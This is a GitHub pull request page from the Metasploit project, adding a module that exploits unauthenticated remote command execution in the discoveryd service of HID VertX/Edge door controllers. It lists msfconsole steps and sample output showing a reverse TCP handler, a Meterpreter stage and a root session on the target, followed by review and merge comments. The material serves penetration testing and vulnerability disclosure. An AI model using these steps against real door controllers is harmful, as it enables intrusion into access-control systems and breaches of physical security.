Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add HID discoveryd command_blink_on Unauthenticated RCE exploit #10133

Merged
merged 2 commits into from
Jul 6, 2018
Merged

Add HID discoveryd command_blink_on Unauthenticated RCE exploit #10133

merged 2 commits into from
Jul 6, 2018

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Jun 3, 2018
edited by wchen-r7
Loading

Add HID discoveryd command_blink_on Unauthenticated RCE exploit.

    This module exploits an unauthenticated remote command execution
    vulnerability in the discoveryd service exposed by HID VertX and Edge
    door controllers.

    This module was tested successfully on a HID Edge model EH400
    with firmware version 2.3.1.603 (Build 04/23/2012).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce
  • set RHOST [IP]
  • set LHOST [IP]
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce 
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123
rhosts => 10.123.123.123
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197
lhost => 10.1.1.197
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.123.123.123:4070 - Connecting to target
[*] Command Stager progress -   0.29% done (26/8993 bytes)
[*] Command Stager progress -   0.58% done (52/8993 bytes)
[*] Command Stager progress -   0.87% done (78/8993 bytes)
[*] Command Stager progress -   1.16% done (104/8993 bytes)
[...]
[*] Command Stager progress -  98.88% done (8892/8993 bytes)
[*] Command Stager progress -  99.17% done (8918/8993 bytes)
[*] Command Stager progress -  99.46% done (8944/8993 bytes)
[*] Command Stager progress -  99.68% done (8964/8993 bytes)
[*] Sending stage (806208 bytes) to 10.123.123.123
[*] Command Stager progress - 100.00% done (8993/8993 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.123.123.123
OS           :  (Linux 2.6.28)
Architecture : armv5tejl
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >

@bwatters-r7
Copy link
Contributor

I have no idea why this is failing Windows sanity tests..... @jmartin-r7 ?

@bcoles
Copy link
Contributor Author

bcoles commented Jun 8, 2018

@bwatters-r7 This PR was submitted while msf infrastructure was having issues. Several PRs around the same time all failed for seemingly irrelevant reasons.

@jmartin-tech
Copy link
Contributor

Jenkins test this please.

@bcoles
Copy link
Contributor Author

bcoles commented Jun 26, 2018

PCAP sent

@space-r7
Copy link
Contributor

space-r7 commented Jul 6, 2018

Verified PCAP

@space-r7 space-r7 merged commit 2c0c99e into rapid7:master Jul 6, 2018
space-r7 added a commit that referenced this pull request Jul 6, 2018
@space-r7
Land #10133, Add HID discoveryd RCE exploit
b5fb970
msjenkins-r7 pushed a commit that referenced this pull request Jul 6, 2018
@space-r7 @msjenkins-r7
Land #10133, Add HID discoveryd RCE exploit
a4f0dc5
@space-r7
Copy link
Contributor

space-r7 commented Jul 6, 2018
edited by tdoan-r7
Loading

Release Notes

The /exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce module has been added to the framework. It exploits an unauthenticated remote command execution vulnerability in the discoveryd service exposed by HID VertX and Edge door controllers.

@bcoles bcoles deleted the hid_discoveryd_command_blink_on_unauth_rce branch July 7, 2018 04:57
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@space-r7 space-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@bcoles @bwatters-r7 @jmartin-tech @space-r7 @tdoan-r7